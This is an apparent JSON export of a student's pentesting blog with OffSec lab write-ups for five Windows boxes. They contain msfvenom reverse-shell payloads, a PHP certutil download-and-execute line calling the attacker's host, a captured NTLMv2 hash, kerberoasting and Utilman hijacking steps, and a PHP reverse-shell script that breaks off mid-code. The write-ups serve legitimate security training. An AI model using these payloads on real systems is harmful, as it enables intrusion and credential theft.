[{"content":"As a kid, whenever something wasn't working, I would get completely absorbed in figuring out why. I found myself spending hours troubleshooting, diving deep into solutions just for the thrill of solving the problem.\nThis curiosity turned into a passion for penetration testing. It's the same mindset, searching for weak spots, understanding how things work, and breaking down problems.\nNow, as a Computer Science Engineering student, I specialize in cybersecurity and have also worked on several computer vision projects. Outside of tech, I pursue freelance art and serve as the captain of my university's boxing team.\nCertification Timeline # Feb 2024 Career Essentials in CyberSecurity (Microsoft) Apr 2024 Certified in Cybersecurity (CC) - ISC2 Jan 2025 Junior Penetration Tester (eJPTv2) - INE Jun 2025 Certified Red Team Professional (CRTP) - Altered Security Aug 2025 Junior Penetration Tester (PT1) - TryHackMe 10/03/2026 Started preparing for OSCP ","date":"15 April 2026","externalUrl":null,"permalink":"/about/","section":"Muqaram Majid","summary":"","title":"About","type":"about"},{"content":"This page has my CTF writeups, exam prep notes, methodologies, cheatsheets, and random notes, basically everything I\u0026rsquo;ve learned and figured I should share.\nCheck out the Tools I use, Cheatsheets for quick refs, and CTF-Writeups from boxes I\u0026rsquo;ve popped. Hope it helps!\n","date":"15 April 2026","externalUrl":null,"permalink":"/","section":"Muqaram Majid","summary":"","title":"Muqaram Majid","type":"page"},{"content":" Access # Overview # OS: Windows AD IP: 192.168.226.187 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # upoaded .htaccess to bypass filter and got rce and then privesc by kerberoasting and SeManageVolume priv.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7) |_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Access The Event 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-04 12:17:21Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name) 443/tcp open ssl/http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7) | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Access The Event | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49671/tcp open msrpc Microsoft Windows RPC 49674/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49701/tcp open msrpc Microsoft Windows RPC Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nand the uploads directory is exposed\nExploitation # path is likely to upload a revshell hidden as a image\nhmm lets try to change the extensionname\nnone of them seem to work , so lets see if we can upload a .htaccess file and allow ourselves\nnow if we change the name of the php file to .dork we shud be able to upload\nwe need to figure out how to get the creds for svc_mssql\nlets get the SPN\nObject Name = krbtgt DN = CN=krbtgt,CN=Users,DC=access,DC=offsec Object Cat. = CN=Person,CN=Schema,CN=Configuration,DC=access,DC=offsec servicePrincipalNames SPN( 1 ) = kadmin/changepw Object Name = MSSQL DN = CN=MSSQL,CN=Users,DC=access,DC=offsec Object Cat. = CN=Person,CN=Schema,CN=Configuration,DC=access,DC=offsec servicePrincipalNames SPN( 1 ) = MSSQLSvc/DC.access.offsec PS C:\\Users\\Public\\Documents\u0026gt; greeat now we can\n.\\\\Rubeus.exe kerberoast /outfile:kerberoast.hashes lets crack it\nthat was instant\nlets use Runas to switch users\nInvoke-RunasCs -Username svc_mssql -Password trustno1 -Command cmd.exe -Remote 192.168.45.197:443 and we hve a new priv now, SeManageVolume\nwe use a script that gives us write perms over C drive and then follow this to get admin shell\nUsing dllref by Siren Security, we identified that tzres.dll is associated with systeminfo. Normally, running systeminfodisplays system details, but if we inject a malicious tzres.dll, we can hijack the process. This allows us to execute a reverse shell, leading to privilege escalation and higher system access.\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.xxx LPORT=443 -f dll -o tzres.dll and then just type systeminfo and boom\n","date":"4 April 2026","externalUrl":null,"permalink":"/ctf-writeups/access/","section":"CTF Writeups","summary":"","title":"Access","type":"ctf-writeups"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/categories/ctf-writeups/","section":"Categories","summary":"","title":"CTF Writeups","type":"categories"},{"content":"Focused writeups from boxes and labs I solved, including enumeration flow, exploit path, and privilege escalation notes.\n","date":"4 April 2026","externalUrl":null,"permalink":"/ctf-writeups/","section":"CTF Writeups","summary":"","title":"CTF Writeups","type":"ctf-writeups"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/tags/hard/","section":"Tags","summary":"","title":"Hard","type":"tags"},{"content":" Heist # Overview # OS: Windows AD IP: 192.168.226.165 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # SSRF and then readgmsa and privesc with SERestore.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-04 18:55:23Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: HEIST | NetBIOS_Domain_Name: HEIST | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: heist.offsec | DNS_Computer_Name: DC01.heist.offsec | DNS_Tree_Name: heist.offsec | Product_Version: 10.0.17763 |_ System_Time: 2026-04-04T18:56:18+00:00 | ssl-cert: Subject: commonName=DC01.heist.offsec | Not valid before: 2026-04-03T18:53:34 |_Not valid after: 2026-10-03T18:53:34 |_ssl-date: 2026-04-04T18:56:58+00:00; -1s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0) |_http-title: Super Secure Web Browser |_http-server-header: Werkzeug/2.0.1 Python/3.9.0 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49677/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (92%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (92%), Microsoft Windows 10 1903 - 21H1 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-04-04T18:56:19 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required Dirbusting # Port 8080 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # visiting port 8080 leads us to think there is some SSRF at play\nsetting up responder with the -wv switch and then visiting our server http://192.168.45.177:80 we capture this\n[HTTP] Sending NTLM authentication request to 192.168.226.165 [HTTP] GET request from: ::ffff:192.168.226.165 URL: / [HTTP] NTLMv2 Client : 192.168.226.165 [HTTP] NTLMv2 Username : HEIST\\enox [HTTP] NTLMv2 Hash : enox::HEIST:787ff23f3cc5c6d4:614FC4F4D6CFDC5CBF7CD29E8DC059F7:010100000000000022AAE28266C4DC01DC02AB51B24B5D26000000000200080043004C004700450001001E00570049004E002D0051005A00520036005500460052004B003200310043000400140043004C00470045002E004C004F00430041004C0003003400570049004E002D0051005A00520036005500460052004B003200310043002E0043004C00470045002E004C004F00430041004C000500140043004C00470045002E004C004F00430041004C00080030003000000000000000000000000030000098BF0D68BEA36AC69F27F02B4B5580B35A970EAA12F2C2D466BA29E944A8C58C0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003100370037000000000000000000 and on cracking it we get the pass for the user enox as california\nlets read svc_apaches gmsa password\n.\\gmsapasswordreader.exe --accountname svc_apache$ we see that the gmsa password is\nwe can use this hash to authenticate now\nevil-winrm -i heist.pg -u svc_apache$ -H 654D2E4EBE552389CD0FD7414DE561C0 authenticating as svc_apache we see that we have the SeRestorePrivilege which lets us write to any location and replace binaries\nlets do this now\ncd C:\\\\Windows\\\\system32 ren Utilman.exe Utilman.old ren cmd.exe Utilman.exe we go to another terminal rdesktop inside and hit windows + u to become admin\nsaw this other writeup which suggests this if we didnt have gui access\nAlternatively, I came across this script SeRestoreAbuse.exe which enable us to run a commad as system if the SeRestorePrivilege is enabled as in our case. I downloaded the scipt form here , uploaded it to the windows machine and run nc. ","date":"4 April 2026","externalUrl":null,"permalink":"/ctf-writeups/heist/","section":"CTF Writeups","summary":"","title":"Heist","type":"ctf-writeups"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/tags/oscp/","section":"Tags","summary":"","title":"Oscp","type":"tags"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/tags/windows/","section":"Tags","summary":"","title":"Windows","type":"tags"},{"content":" Medjed # Overview # OS: Windows IP: 192.168.167.127 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE easy and privesc with barracuda.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # nmap -p- 192.168.167.127 -Pn -sCV -A --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-03 09:32 EDT Warning: 192.168.167.127 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.167.127 Host is up (0.083s latency). Not shown: 65215 closed tcp ports (reset), 303 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized) 5040/tcp open unknown 8000/tcp open http-alt BarracudaServer.com (Windows) | http-methods: |_ Potentially risky methods: PROPFIND PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-title: Home | fingerprint-strings: | FourOhFourRequest, Socks5: | HTTP/1.1 200 OK | Date: Fri, 03 Apr 2026 13:32:59 GMT | Server: BarracudaServer.com (Windows) | Connection: Close | GenericLines, GetRequest: | HTTP/1.1 200 OK | Date: Fri, 03 Apr 2026 13:32:53 GMT | Server: BarracudaServer.com (Windows) | Connection: Close | HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Date: Fri, 03 Apr 2026 13:33:04 GMT | Server: BarracudaServer.com (Windows) | Connection: Close | SIPOptions: | HTTP/1.1 400 Bad Request | Date: Fri, 03 Apr 2026 13:34:08 GMT | Server: BarracudaServer.com (Windows) | Connection: Close | Content-Type: text/html | Cache-Control: no-store, no-cache, must-revalidate, max-age=0 |_ \u0026lt;html\u0026gt;\u0026lt;body\u0026gt;\u0026lt;h1\u0026gt;400 Bad Request\u0026lt;/h1\u0026gt;Can\u0026#39;t parse request\u0026lt;p\u0026gt;BarracudaServer.com (Windows)\u0026lt;/p\u0026gt;\u0026lt;/body\u0026gt;\u0026lt;/html\u0026gt; | http-webdav-scan: | Server Type: BarracudaServer.com (Windows) | WebDAV type: Unknown | Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK |_ Server Date: Fri, 03 Apr 2026 13:35:40 GMT |_http-server-header: BarracudaServer.com (Windows) 30021/tcp open ftp FileZilla ftpd 0.9.41 beta | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -r--r--r-- 1 ftp ftp 536 Nov 03 2020 .gitignore | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 app | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 bin | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 config | -r--r--r-- 1 ftp ftp 130 Nov 03 2020 config.ru | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 db | -r--r--r-- 1 ftp ftp 1750 Nov 03 2020 Gemfile | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 lib | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 log | -r--r--r-- 1 ftp ftp 66 Nov 03 2020 package.json | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 public | -r--r--r-- 1 ftp ftp 227 Nov 03 2020 Rakefile | -r--r--r-- 1 ftp ftp 374 Nov 03 2020 README.md | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 test | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 tmp |_drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 vendor | ftp-syst: |_ SYST: UNIX emulated by FileZilla |_ftp-bounce: bounce working! 33033/tcp open unknown | fingerprint-strings: | GenericLines: | HTTP/1.1 400 Bad Request | GetRequest, HTTPOptions: | HTTP/1.0 403 Forbidden | Content-Type: text/html; charset=UTF-8 | Content-Length: 3102 | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta charset=\u0026#34;utf-8\u0026#34; /\u0026gt; | \u0026lt;title\u0026gt;Action Controller: Exception caught\u0026lt;/title\u0026gt; | \u0026lt;style\u0026gt; | body { | background-color: #FAFAFA; | color: #333; | margin: 0px; | body, p, ol, ul, td { | font-family: helvetica, verdana, arial, sans-serif; | font-size: 13px; | line-height: 18px; | font-size: 11px; | white-space: pre-wrap; | pre.box { | border: 1px solid #EEE; | padding: 10px; | margin: 0px; | width: 958px; | header { | color: #F0F0F0; | background: #C52F24; | padding: 0.5em 1.5em; | margin: 0.2em 0; | line-height: 1.1em; | font-size: 2em; | color: #C52F24; | line-height: 25px; | .details { |_ bord 44330/tcp open ssl/unknown |_ssl-date: 2026-04-03T13:36:08+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=server demo 1024 bits/organizationName=Real Time Logic/stateOrProvinceName=CA/countryName=US | Not valid before: 2009-08-27T14:40:47 |_Not valid after: 2019-08-25T14:40:47 45332/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23) |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23 |_http-title: Quiz App | http-methods: |_ Potentially risky methods: TRACE 45443/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23 |_http-title: Quiz App 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 2 services unrecognized despite returning data. If you know the s FTP # |_http-server-header: BarracudaServer.com (Windows) 30021/tcp open ftp FileZilla ftpd 0.9.41 beta | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -r--r--r-- 1 ftp ftp 536 Nov 03 2020 .gitignore | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 app | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 bin | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 config | -r--r--r-- 1 ftp ftp 130 Nov 03 2020 config.ru | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 db | -r--r--r-- 1 ftp ftp 1750 Nov 03 2020 Gemfile | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 lib | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 log | -r--r--r-- 1 ftp ftp 66 Nov 03 2020 package.json | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 public | -r--r--r-- 1 ftp ftp 227 Nov 03 2020 Rakefile | -r--r--r-- 1 ftp ftp 374 Nov 03 2020 README.md | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 test | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 tmp |_drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 vendor | ftp-syst: |_ SYST: UNIX emulated by FileZilla |_ftp-bounce: bounce working! 33033/tcp open unknown | fingerprint-strings: Dirbusting # Port 8000 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # lets go here\nnothing happened, ah i did something stupid i didnt go to the webroot\nthis seems to be the webroot for the quiz game we saw earlier lets upload here and visit it\nand we are in\n","date":"3 April 2026","externalUrl":null,"permalink":"/ctf-writeups/medjed/","section":"CTF Writeups","summary":"","title":"Medjed","type":"ctf-writeups"},{"content":" Nickel # Overview # OS: Windows IP: 192.168.117.99 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # exposed api endpoint gave weak creds , privesc with web hosted taking arguments.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd 0.9.60 beta | ftp-syst: |_ SYST: UNIX emulated by FileZilla 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) | ssh-hostkey: | 3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA) | 256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA) |_ 256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=nickel | Not valid before: 2025-12-06T11:11:21 |_Not valid after: 2026-06-07T11:11:21 |_ssl-date: 2026-04-02T13:07:47+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: NICKEL | NetBIOS_Domain_Name: NICKEL | NetBIOS_Computer_Name: NICKEL | DNS_Domain_Name: nickel | DNS_Computer_Name: nickel | Product_Version: 10.0.18362 |_ System_Time: 2026-04-02T13:06:39+00:00 5040/tcp open unknown 7680/tcp open pando-pub? 8089/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Site doesn\u0026#39;t have a title. |_http-server-header: Microsoft-HTTPAPI/2.0 33333/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Site doesn\u0026#39;t have a title. 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Dirbusting # Port 8089 # Web behavior was the main signal here, so I traced each response change before exploitation.\nclicking them does nothing\nseems to be calling port 3333 w get\nwhen we curl it shows this\nlets try post\nExploitation # name : cmd.exe commandline : cmd.exe C:\\windows\\system32\\DevTasks.exe --deploy C:\\work\\dev.yaml --user ariah -p \u0026#34;Tm93aXNlU2xvb3BUaGVvcnkxMzkK\u0026#34; --server nickel-dev --protocol ssh lets ssh in now\nwasnt working then i noticed its probably encrypted\nannnd we are in\non getting the pdf file and cracking it with pdf2john we see this\nnetstat shows us port 80 is open\nand then\nnet localgroup Administrators fatcat /add net localgroup \u0026#39;Remote Desktop Users\u0026#39; fatcat /add and now we can just rdp in\n└─$ xfreerdp /cert:ignore /dynamic-resolution +clipboard /u:\u0026#39;fatcat\u0026#39; /p:\u0026#39;password\u0026#39; /v:NICKEL ","date":"2 April 2026","externalUrl":null,"permalink":"/ctf-writeups/nickel/","section":"CTF Writeups","summary":"","title":"Nickel","type":"ctf-writeups"},{"content":" Shenzi # Overview # OS: Windows IP: 192.168.117.55 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # initial access through wordpress and rpivesc with Always install Elevated.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65339 closed tcp ports (reset), 181 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd 0.9.41 beta | ftp-syst: |_ SYST: UNIX emulated by FileZilla 80/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | http-title: Welcome to XAMPP |_Requested resource was http://192.168.117.55/dashboard/ |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 | http-title: Welcome to XAMPP |_Requested resource was https://192.168.117.55/dashboard/ | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time 445/tcp open microsoft-ds? 3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized) 5040/tcp open unknown 7680/tcp open pando-pub? 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). SMB # I validated this step using the evidence below before moving forward in the chain.\n1) MySQL (phpMyAdmin): User: root Password: (means no password!) 3) Mercury (not in the USB \u0026amp; lite version): Postmaster: Postmaster (postmaster@localhost) Administrator: Admin (admin@localhost) User: newuser Password: wampp 4) WEBDAV: User: xampp-dav-unsecure Password: ppmax2011 5) WordPress: User: admin Password: FeltHeadwallWight357 Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nfound out that the wordpress is being hoted on the director Shenzi and visiting that we reach here\nExploitation # lets get RCE thru wp\nlets\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.150 LPORT=4444 -f exe -o 64.exe we can paste this in the theme header\n\u0026lt;?php exec(\u0026#34;certutil -urlcache -split -f \u0026lt;http://192.168.45.176/64.exe\u0026gt; C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\64.exe\u0026#34;); exec(\u0026#34;C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\64.exe\u0026#34;); ?\u0026gt; now visit http://192.168.208.55/shenzi/themes/twentytwenty/404.php after editing 404\nyeah well this is not working for me for some reason so lets try another approach\nediting the theme header with this\n\u0026lt;?php // Copyright (c) 2020 Ivan Sincek // v2.3 // Requires PHP v5.0.0 or greater. // Works on Linux OS, macOS, and Windows OS. // See the original script at https://github.com/pentestmonkey/php-reverse-shell. class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;r\u0026#39;), // shell can read from STDIN 1 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;w\u0026#39;), // shell can write to STDOUT 2 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;w\u0026#39;) // shell can write to STDERR ); private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function __construct($addr, $port) { $this-\u0026gt;addr = $addr; $this-\u0026gt;port = $port; } private function detect() { $detected = true; if (stripos(PHP_OS, \u0026#39;LINUX\u0026#39;) !== false) { // same for macOS $this-\u0026gt;os = \u0026#39;LINUX\u0026#39;; $this-\u0026gt;shell = \u0026#39;bash\u0026#39;; } else if (stripos(PHP_OS, \u0026#39;WIN32\u0026#39;) !== false || stripos(PHP_OS, \u0026#39;WINNT\u0026#39;) !== false || stripos(PHP_OS, \u0026#39;WINDOWS\u0026#39;) !== false) { $this-\u0026gt;os = \u0026#39;WINDOWS\u0026#39;; $this-\u0026gt;shell = \u0026#39;cmd.exe\u0026#39;; } else { $detected = false; echo \u0026#34;SYS_ERROR: Underlying operating system is not supported, script will now exit...\\n\u0026#34;; } return $detected; } private function daemonize() { $exit = false; if (!function_exists(\u0026#39;pcntl_fork\u0026#39;)) { echo \u0026#34;DAEMONIZE: pcntl_fork() does not exists, moving on...\\n\u0026#34;; } else if (($pid = @pcntl_fork()) \u0026lt; 0) { echo \u0026#34;DAEMONIZE: Cannot fork off the parent process, moving on...\\n\u0026#34;; } else if ($pid \u0026gt; 0) { $exit = true; echo \u0026#34;DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n\u0026#34;; } else if (posix_setsid() \u0026lt; 0) { // once daemonized you will actually no longer see the script\u0026#39;s dump echo \u0026#34;DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n\u0026#34;; } else { echo \u0026#34;DAEMONIZE: Completed successfully!\\n\u0026#34;; } return $exit; } private function settings() { @error_reporting(0); @set_time_limit(0); // do not impose the script execution time limit @umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function dump($data) { $data = str_replace(\u0026#39;\u0026lt;\u0026#39;, \u0026#39;\u0026amp;lt;\u0026#39;, $data); $data = str_replace(\u0026#39;\u0026gt;\u0026#39;, \u0026#39;\u0026amp;gt;\u0026#39;, $data); echo $data; } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this-\u0026gt;error = true; // set global error flag echo \u0026#34;STRM_ERROR: Cannot read from ${name}, script will now exit...\\n\u0026#34;; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this-\u0026gt;error = true; // set global error flag echo \u0026#34;STRM_ERROR: Cannot write to ${name}, script will now exit...\\n\u0026#34;; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this-\u0026gt;read($input, $iname, $this-\u0026gt;buffer)) \u0026amp;\u0026amp; $this-\u0026gt;write($output, $oname, $data)) { if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39; \u0026amp;\u0026amp; $oname === \u0026#39;STDIN\u0026#39;) { $this-\u0026gt;clen += strlen($data); } // calculate the command length $this-\u0026gt;dump($data); // script\u0026#39;s dump } } // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat[\u0026#39;size\u0026#39;]; if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39; \u0026amp;\u0026amp; $iname === \u0026#39;STDOUT\u0026#39; \u0026amp;\u0026amp; $this-\u0026gt;clen) { // for some reason Windows OS pipes STDIN into STDOUT // we do not like that // we need to discard the data from the stream while ($this-\u0026gt;clen \u0026gt; 0 \u0026amp;\u0026amp; ($bytes = $this-\u0026gt;clen \u0026gt;= $this-\u0026gt;buffer ? $this-\u0026gt;buffer : $this-\u0026gt;clen) \u0026amp;\u0026amp; $this-\u0026gt;read($input, $iname, $bytes)) { $this-\u0026gt;clen -= $bytes; $size -= $bytes; } } while ($size \u0026gt; 0 \u0026amp;\u0026amp; ($bytes = $size \u0026gt;= $this-\u0026gt;buffer ? $this-\u0026gt;buffer : $size) \u0026amp;\u0026amp; ($data = $this-\u0026gt;read($input, $iname, $bytes)) \u0026amp;\u0026amp; $this-\u0026gt;write($output, $oname, $data)) { $size -= $bytes; $this-\u0026gt;dump($data); // script\u0026#39;s dump } } public function run() { if ($this-\u0026gt;detect() \u0026amp;\u0026amp; !$this-\u0026gt;daemonize()) { $this-\u0026gt;settings(); // ----- SOCKET BEGIN 